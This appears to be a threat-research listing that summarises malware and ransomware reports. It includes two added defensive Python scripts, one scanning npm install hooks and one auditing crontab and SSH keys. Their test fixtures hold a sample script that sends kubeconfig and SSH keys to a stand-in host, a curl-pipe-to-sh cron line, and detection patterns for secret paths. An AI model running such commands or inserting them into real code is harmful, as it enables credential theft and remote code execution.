Check Point researchers expose a dual-use ecosystem in which GuLoader and Remcos are marketed as legitimate tools, with GuLoader acting as a crypter that helps Remcos evade antivirus and deliver payloads. The investigation ties BreakingSecurity and VgoStore to ThePro…
Category: Threat Research
Sonatype researchers are tracking an ongoing npm registry campaign where malicious packages are used to retrieve and exfiltrate Kubernetes configuration and SSH keys to an external server. At least 14 such packages have been identified, impersonating legitimat…
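The campaign above turns on a detail worth checking in your own dependency tree: npm runs `preinstall`/`install`/`postinstall` hooks automatically, so a package that reads `~/.kube/config` or `~/.ssh/id_rsa` from such a hook can steal credentials before any of its code is imported. The scanner below is an added example for this listing, not Sonatype's tooling; the package names, file contents and indicator patterns are constructed for illustration and are not indicators from the campaign.

```python
"""Flag npm packages whose install-time lifecycle scripts reach for
Kubernetes or SSH credentials. Added example; patterns and sample
packages are constructed, not campaign indicators."""
import json
import re
import tempfile
from pathlib import Path

# npm runs these automatically during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Assumed indicators: where kubeconfigs and SSH keys normally live.
SECRET_PATTERNS = [
    re.compile(r"\.kube/config"),
    re.compile(r"\bKUBECONFIG\b"),
    re.compile(r"\.ssh/(?:id_[a-z0-9]+|authorized_keys|config)"),
]
# Assumed indicators: ways a script could push data off the host.
EXFIL_PATTERNS = [
    re.compile(r"\b(?:curl|wget)\b"),
    re.compile(r"\bhttps?://"),
    re.compile(r"\b(?:https?|net|dns)\.request\b|\bfetch\("),
]


def _referenced_files(pkg_dir: Path, command: str) -> list:
    """Files inside the package that a hook command appears to execute."""
    files = []
    for token in re.split(r"\s+|&&|;|\|\|?", command):
        token = token.strip("\"'")
        if token.endswith((".js", ".mjs", ".cjs", ".sh")):
            candidate = pkg_dir / token
            if candidate.is_file():
                files.append(candidate)
    return files


def _hits(text: str, patterns) -> list:
    return [p.pattern for p in patterns if p.search(text)]


def scan_package(pkg_dir) -> list:
    """One finding per hook command or hook-run file that names a secret path."""
    pkg_dir = Path(pkg_dir)
    manifest_path = pkg_dir / "package.json"
    if not manifest_path.is_file():
        return []
    scripts = json.loads(manifest_path.read_text()).get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        # Scan the hook command itself and any script file it runs.
        sources = [("scripts." + hook, command)]
        sources += [(f.name, f.read_text(errors="replace"))
                    for f in _referenced_files(pkg_dir, command)]
        for where, text in sources:
            secrets = _hits(text, SECRET_PATTERNS)
            if secrets:
                findings.append({"hook": hook, "where": where,
                                 "secrets": secrets,
                                 "exfil": _hits(text, EXFIL_PATTERNS)})
    return findings


def scan_node_modules(root) -> dict:
    """Scan every package, including @scoped ones, under a node_modules dir."""
    root = Path(root)
    results = {}
    for entry in sorted(root.iterdir()):
        if not entry.is_dir():
            continue
        dirs = sorted(entry.iterdir()) if entry.name.startswith("@") else [entry]
        for pkg_dir in dirs:
            findings = scan_package(pkg_dir)
            if findings:
                results[pkg_dir.relative_to(root).as_posix()] = findings
    return results


def build_sample_tree(root: Path) -> None:
    """Constructed node_modules: one benign package, one credential thief."""
    benign = root / "benign-build-tool"
    benign.mkdir(parents=True)
    (benign / "package.json").write_text(json.dumps(
        {"name": "benign-build-tool", "version": "1.0.0",
         "scripts": {"install": "node-gyp rebuild"}}))
    evil = root / "@acme-example" / "kube-bridge"   # hypothetical name
    evil.mkdir(parents=True)
    (evil / "package.json").write_text(json.dumps(
        {"name": "@acme-example/kube-bridge", "version": "2.1.0",
         "scripts": {"postinstall": "node index.js"}}))
    (evil / "index.js").write_text(
        'const fs = require("fs"), os = require("os"), https = require("https");\n'
        'const kube = fs.readFileSync(os.homedir() + "/.kube/config", "utf8");\n'
        'const key = fs.readFileSync(os.homedir() + "/.ssh/id_rsa", "utf8");\n'
        'const req = https.request({host: "collector.example", method: "POST", path: "/u"});\n'
        'req.end(JSON.stringify({kube, key}));\n')


def demo() -> dict:
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "node_modules"
        build_sample_tree(root)
        return scan_node_modules(root)


if __name__ == "__main__":
    for name, findings in demo().items():
        for f in findings:
            print(f"{name}: {f['hook']} -> {f['where']} "
                  f"secrets={f['secrets']} exfil={f['exfil']}")
```

Run it against a real `node_modules` with `scan_node_modules("node_modules")`; a hit with both `secrets` and `exfil` populated is the pattern described above and deserves a look before the next `npm install`. Obfuscated or minified scripts will not match these plain-text patterns, so treat an empty result as "nothing obvious", not as a clean bill.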
SmokeLoader has expanded beyond downloading and dropping other malware by offering plugins that harvest data from infected machines, including browser data, emails, cookies, and passwords. The Bitsight analysis dissects eight plugins (four 32-bit and four 64-b…
In recent weeks, we observed an increase in .NET-based malware using DLL sideloading. A prominent example is JanelaRAT, a recent campaign targeting Latin American FinTech users. The initial attack involves a phishing email, mainly in Portuguese. The user is tricked into running a Visual Basic script, which then downloads the…
Threat actors using RedLine and Vidar initially deployed EV code-signed info stealers and later reused the same spear-phishing delivery chain to deliver ransomware (Ransom.Win64.CYCLOPS.A / “Knight” family). The campaign used double-extension attachments, remo…
Unit 42 researchers analyzed a fake PoC for CVE-2023-40477 in WinRAR that ultimately delivered VenomRAT via a multi-stage infection chain based on a PoC for CVE-2023-25157. The actors used social engineering and publicly available PoC code to lure miscreants i…
Cado Security Labs observed a 600x spike in P2Pinfect activity, with rapid variant updates and expanding geographic reach across major cloud providers. The analysis covers how the botnet infects Redis on Linux hosts, persists via cron and SSH mechanisms, and s…
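The two persistence mechanisms named above, cron entries and SSH access, are also the cheapest places to look on a Redis host you suspect. The audit below is an added example for this listing, not Cado Security's tooling: the cron heuristics, the key material (synthetic blobs, not real keys), the sample lines and the TEST-NET address are all constructed for illustration. The fingerprint routine does follow the OpenSSH convention (`SHA256:` plus unpadded base64 of the SHA-256 of the decoded key blob), so it matches what `ssh-keygen -lf` prints.

```python
"""Audit crontab entries and authorized_keys for the persistence mechanisms
Linux botnet malware relies on. Added example; rules, keys and sample
lines are constructed for illustration."""
import base64
import hashlib
import re

# Assumed cron indicators: download-and-run pipelines, payloads staged in
# world-writable or memory-backed dirs, decode-on-the-fly, minute cadence.
CRON_RULES = [
    ("download-and-exec", re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b")),
    ("staging-dir", re.compile(r"/(?:tmp|var/tmp|dev/shm)/")),
    ("inline-decode", re.compile(r"\bbase64\s+(?:-d|--decode)\b")),
    ("every-minute", re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s")),
]


def audit_crontab(lines):
    """Return (line, [rule names]) for every entry that trips a rule."""
    findings = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        hits = [name for name, rx in CRON_RULES if rx.search(line)]
        if hits:
            findings.append((line, hits))
    return findings


def ssh_fingerprint(blob_b64):
    """OpenSSH-style SHA256 fingerprint of a base64 public-key blob."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def audit_authorized_keys(lines, allowed_fingerprints):
    """Flag keys not on the allowlist, and keys carrying a forced command
    (a backdoor key can use command= to run a payload on every login)."""
    findings = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # Options such as command="..." may precede the key type.
        m = re.search(r"(?:^|\s)(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-\S+)\s+(\S+)", line)
        if not m:
            continue
        fp = ssh_fingerprint(m.group(2))
        reasons = []
        if fp not in allowed_fingerprints:
            reasons.append("unknown-key")
        if "command=" in line[: m.start()]:
            reasons.append("forced-command")
        if reasons:
            findings.append((fp, reasons))
    return findings


def _fake_blob(seed):
    """Constructed ed25519-shaped key blob; not a usable key."""
    body = (b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20"
            + hashlib.sha256(seed).digest())
    return base64.b64encode(body).decode()


ADMIN_KEY = _fake_blob(b"admin")   # the one key that should be present
ROGUE_KEY = _fake_blob(b"rogue")   # planted by the intruder

# Constructed sample input; 203.0.113.7 is a TEST-NET-3 address.
SAMPLE_CRONTAB = [
    "# m h dom mon dow command",
    "0 3 * * * /usr/bin/certbot renew --quiet",
    "* * * * * /bin/sh -c 'curl -fsSL http://203.0.113.7/x | sh'",
    "@reboot /dev/shm/.x/run >/dev/null 2>&1",
    "30 2 * * 0 /usr/local/bin/backup.sh",
]
SAMPLE_AUTHORIZED_KEYS = [
    f"ssh-ed25519 {ADMIN_KEY} admin@bastion",
    f'command="/tmp/.redis/run" ssh-ed25519 {ROGUE_KEY} redis',
]


def demo():
    allowed = {ssh_fingerprint(ADMIN_KEY)}
    return {"cron": audit_crontab(SAMPLE_CRONTAB),
            "ssh": audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, allowed)}


if __name__ == "__main__":
    for line, hits in demo()["cron"]:
        print("cron:", hits, line)
    for fp, reasons in demo()["ssh"]:
        print("ssh:", reasons, fp)
```

On a live host, feed it `crontab -l` for every user plus `/etc/cron.d/*`, and the `authorized_keys` of every account that can log in, with the allowlist built from your own key inventory. Unknown keys and forced commands are the actionable output; the cron rules are noisy by design and need a human to read the flagged line.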
NoEscape ransomware emerged in 2023 as a RaaS closely tied to Avaddon through similar encryption and deployment tactics, while expanding to Windows and Linux payloads and leveraging a Tor-based platform for victim disclosure. It combines multi-extortion with…
Gh0st RAT variants, including HiddenGh0st, are actively used to attack MS-SQL servers and deploy a public rootkit to hide infections and protect malicious activity. The operation collects extensive system data, exfiltrates credentials via Mimikatz, and enables…
BlackBerry researchers identify a financially motivated campaign, dubbed “Silent Skimmer,” targeting online payment infrastructure across APAC and NALA with web-server compromises to steal payment data. The operation leverages vulnerabilities in web applicatio…
Proofpoint notes a rise in Chinese-themed malware campaigns targeting Chinese-language speakers, including Sainbox (Gh0stRAT variant) and the newly identified ValleyRAT, alongside legacy Purple Fox. The campaigns use Chinese-language lures and diverse delivery…
CRIL researchers document widespread use of the open-source PySilon RAT by multiple threat actors, with VirusTotal reporting over 300 samples since June 2023. PySilon evolved from v1.0 (Dec 2022) to v3.6 (Aug 2023) and now offers extensive capabilities such as…
CyberCX DFIR describes Akira ransomware leveraging Hyper-V to deploy on new, unmonitored VMs to bypass EDR, causing widespread damage to attached VMs. The piece also covers attacker methods from initial access to post-exploitation, defense evasion with BYOVD t…
Sophos X-Ops documents a surge in pig butchering scams that push victims into fake liquidity mining schemes, exploiting DeFi concepts and social engineering rather than malware. A detailed victim case shows romance-based outreach via MeetMe, persistent multi-c…
eSentire intercepted three LockBit affiliate ransomware attacks aimed at an MSP and two manufacturers, halting them before widespread impact. The report highlights how attackers used RMM tools and remote-access software—and even brought their own tools—to prop…